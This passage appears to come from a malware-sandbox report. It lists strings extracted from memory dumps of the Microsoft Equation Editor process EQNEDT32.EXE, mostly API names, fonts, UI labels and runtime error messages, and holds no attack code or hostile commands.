Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalReAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalSize

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

GlobalUnlock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Greek . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Greek characters (uppercase)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

H bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

H=%s, W=%s, B=%d-Some resources are missing from EQNEDT32.EXE.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

header

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

headerf

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

headerl

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

headerr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

HeapAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

HeapCreate

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

HeapDestroy

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

HeapFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Help index

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Helvetica

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Helvetica-Bold

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Helvetica-BoldOblique

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Helvetica-Oblique

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

how &All

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ick between elements to

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ience, Inc.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ign &Right

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

imm32.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmAssociateContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetCompositionStringA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetConversionStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmGetOpenStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmNotifyIME

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmReleaseContext

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetCompositionFontA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetCompositionWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ImmSetOpenStatus

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

In-situ Equation

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

inner1 pt space

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

integral

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Integral with subscript limit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ion . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

IsBadReadPtr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

IsDBCSLeadByte

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Italic

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

JanFebMarAprMayJunJulAugSepOctNovDec

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

l . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Labeled arrow templates!Products and set theory templates

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Language:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

larges the application window to full sizeNot available - the window is zoomed to its maximum size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LCGreek

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LCMapStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LCMapStringW

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

le&arDelete

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

lign at &%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

lign:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LimDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LimHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LimLineSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Line spacing

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

LineSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

LoadLibraryA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LoadResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalFree

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalLock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalReAlloc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LocalUnlock

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

LockResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrcmpA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrcmpiA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrcpyA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

lstrlenA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Mac PICT

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Macro Insertion

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Magnification

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

MainMTWin

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MainWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

MathLanguage

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MathType

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MatrixColSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

MatrixRowSpacing

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

MessageBoxA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MFEnumFunc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Microsoft Visual C++ Runtime Library

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MinGap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Missing Resource: type='%d', ID=%d'.

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MoveFileA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

MS Serif

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

msi.dll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MsiProvideQualifiedComponentA

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT Extra

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT ExtraText (FE)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

MT Symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT Symbol Italic

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

MT%s.TMP

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MT-Symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MtInsituFilterClass

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MtInsituWndProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

MTUpgradeDialog

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

MulDiv

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

MultiByteToWideChar

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

n't UndoCtrl+Z

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Native

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

NINSITUCLASS

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Normal subgroup

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Not yet implemented.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

nown filename extension.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Number

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

NumerHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

object

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Object Descriptor

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

OfficeUILanguage

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

OleObjSetExtent called; x = %d, y = %d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

OLEStartupAsServer

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

oolbar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

OpenFile

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Other Size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Other Style

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Other styles

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

OutputDebugStringA

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Over-bar

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

OwnerLink

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ParamDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

partition lines.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

pdateF3

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Perpendicular toUnderscore

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

PopupMenuWinProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Prime Height

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

PrimeHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

ProductName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

qual column &widths

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

qual row heights

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

R&ight

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

R6002- floating point not loaded

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6008- not enough space for arguments

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6009- not enough space for environment

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6016- not enough space for thread data

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6017- unexpected multithread lock error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6018- unexpected heap error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6019- unable to open console device

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6024- not enough space for _onexit/atexit table

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6025- pure virtual function call

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6026- not enough space for stdio initialization

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6027- not enough space for lowio initialization

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

R6028- unable to initialize heap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

RadicalGap

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

RaiseException

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Reduced-size vertical fraction

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

regedit /s

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

RegisterInsituClass Failed

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ri&x-Vector

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Rich Text Format

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Right braceSimilar to

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

rix...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

RtlUnwind

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

runtime error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Runtime Error!Program:

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

s Control Panel window

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Save changes to %s?

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Script

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

scription

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ScriptScript

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SCROLLBAR

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

sDecimal

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

server

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SetEndOfFile

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

SetErrorMode

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

SetFilePointer

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ShowAll

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SING error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

SizeDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

SizeofResource

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

Sizes

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

sList

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Small Fonts

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Small Fontsman

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SmallLargeIncr

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Smile

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Software\Microsoft\Equation Editor\3.0\Options

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Software\Microsoft\Office\Common\8.0\Command Bars\ButtonSize

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Software\Microsoft\Shared

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Spacing

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SpacingFactor

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SpacingWindow

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

StatBarFrame

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

StringFileInfo

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Style

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

StyleDefDlogProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

StyleOtherDlgProc

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Styles

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

stylesheet

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Sub-Sy&mbol

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

SubFractBarThick

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Subscript

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

SubscriptDepth

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SubSymbol

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

SunMonTueWedThuFriSat

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

SuperscriptHeight

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

symbol

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

SymbolSub-symbol

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

system\currentcontrolset\control\keyboard layout

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

TerminateProcess

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00464000.00000004.mdmp)

ternalName

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Text style

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

TextFE

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

TextLanguage

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

the application windowNot available - the window is zoomed to its maximum size

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

the Equation Editor version and copyright

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

This equation was created with MathType. Tab-stop formatting will be lost; User 1 & 2 styles will be converted to the Text style; User 1 & 2 typesizes will be converted to the Full typesize.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Times

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Times New Roman

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

Times-Bold

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Times-BoldItalic

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Times-Italic

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

Times-Roman

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

tion window to normal sizeNot available - the window is not maximized or minimized

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

TLOSS error

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00453000.00000002.mdmp)

Tms Rmn

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

to the file. The disk may be full.+File does not contain Equation Editor data.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

Too many windows open.#Not enough memory to open a window.KUsing tab formatting without left alignment may produce unexpected results.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

ToolbarDocked

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ToolbarDockPos

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ToolbarShown

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

ToolbarWinPos

